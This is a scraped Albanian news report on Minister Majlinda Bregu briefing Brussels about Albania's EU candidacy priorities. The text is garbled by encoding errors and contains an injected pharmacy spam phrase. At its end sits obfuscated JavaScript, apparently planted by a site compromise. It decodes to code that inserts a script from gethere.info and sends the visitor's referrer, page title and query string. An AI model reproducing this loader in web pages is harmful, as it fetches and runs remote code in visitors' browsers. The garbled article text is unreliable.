largea_bregu1352361166

Majlinda Bregu raporton nA� Bruksel

tadalafil online india. Ministrja e Integrimit, Majlinda Bregu raportoi nA� Bruksel pA�r zhvillimet nA� ShqipA�ri, qA� kanA� tA� bA�jnA� me plotA�simin e prioriteteve tA� vendosura nga BE pA�r marjen e statusit tA� vendit kandidat.

Sipas saj, mos miratimi i ligjeve me 3/5-at e bA�n tA� vA�shtirA� kA�rkesA�n e ShqipA�risA� pA�r mbA�shtetjen e vendeve anA�tare nA� samitin e dhjetorit.

NdA�rkohA�, zyrtarA�t europianA� kA�rkuan sA�rish qA� maxhoranca dhe opozita tA� bashkA�punojnA�, pasi kjo sipas tyre A�shtA� thelbA�sore pA�r ShqipA�rinA�.

Majlinda Bregu, Ministre e Integrimit Europian: a�?TA� gjitha takimet dhe informacionet janA� takime pA�r tA� mbajtur njA� ritA�m informacioni tA� qetA�, tA� saktA� edhe le tA� themi shumA� tA� ndA�rgjegjshA�m, pA�r atA� A�farA� ka ndodhur nA� ShqipA�ri, pA�r zbatimin jo vetA�m tA� 12 prioriteteve, sepse nuk bA�het fjalA� vetA�m pA�r reformat, apo pA�r pjesA� tA� cilat janA� identifikuar si prioritete nA� pA�rcaktimin e 12 prioriteteve, por pA�r tA� gjitha refomat nA� pA�rgjithA�si.

Mbetet ende njA� A�A�shtje, pA�r tA� cilA�n ne jemi shumA� tA� ndA�rgjegjshA�m, se gjuha pA�r tA� kA�rkuar mbA�shtetje nga vendet anA�tare edhe pA�r samitin e dhjetorit bA�het mA� e vA�shtirA�, nA� rast se nuk votohen 3 A�A�shtjet qA� kanA� mbetur ende pezull nA� Parlamentin shqiptara�?.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}